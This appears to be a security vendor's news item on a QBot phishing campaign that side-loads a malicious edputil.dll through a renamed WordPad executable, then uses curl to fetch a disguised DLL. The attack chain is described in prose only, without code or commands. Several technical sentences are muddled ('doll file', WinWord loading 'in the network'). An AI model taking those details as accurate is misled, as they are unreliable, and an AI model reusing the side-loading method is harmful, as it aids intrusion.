HQ/EMEAFind out how we can help your business
A new malicious campaign from the QBot malware operators has utilised a DLL hijacking vulnerability in the WordPad utility app to bypass security detections. Exploiting legitimate Windows programs and utility tools is becoming a standard malware distribution tool for threat actors.
Based on reports, the new QBot phishing attack leverages a flaw within the WordPad executable dubbed, write[.]exe. The operation begins with phishing emails that deceive potential targets into downloading a file in the attached link. Once a user clicks the attached link, the site will download a randomly named ZIP file from a remote server.
Researchers stated that the ZIP archive contains a couple of files. The first file is a Windows executable called document[.]exe, and the other is a doll file called edputil[.]dll. Moreover, the first document is a renamed duplicate of the legitimate Write[.]exe file.
The new QBot malware campaign could execute its attacks quickly.
An analysis of the attack explained that the QBot malware could quickly infect a target once a user executes the earlier-mentioned document to load in the device’s network.
The executable will try to load the second file to review if it is within the designated folder. Next, the campaign leverages a malicious version of the second file and stores it in the same folder to impersonate the legitimate one.
Subsequently, the process will load WinWord using the malicious DLL if it is in the network. Once the DLL loads, it will utilise curl[.]exe to download another DLL archive that impersonates a PNG file. This last DLL will launch the QBot malware.
QBot could then steal emails to run more phishing accounts and download payloads, like Cobalt Strike, to acquire initial access to the targeted system. The compromised system could also suffer further infection since the malware could spread laterally throughout an entire network. These accesses often result in corporate data theft and ransomware infections.
QBot malware operators have always been a threat group that quickly changed attack strategies. Therefore, organisations should be careful of these threats since QBot could now use legitimate Windows Programs and move laterally across different infrastructures.
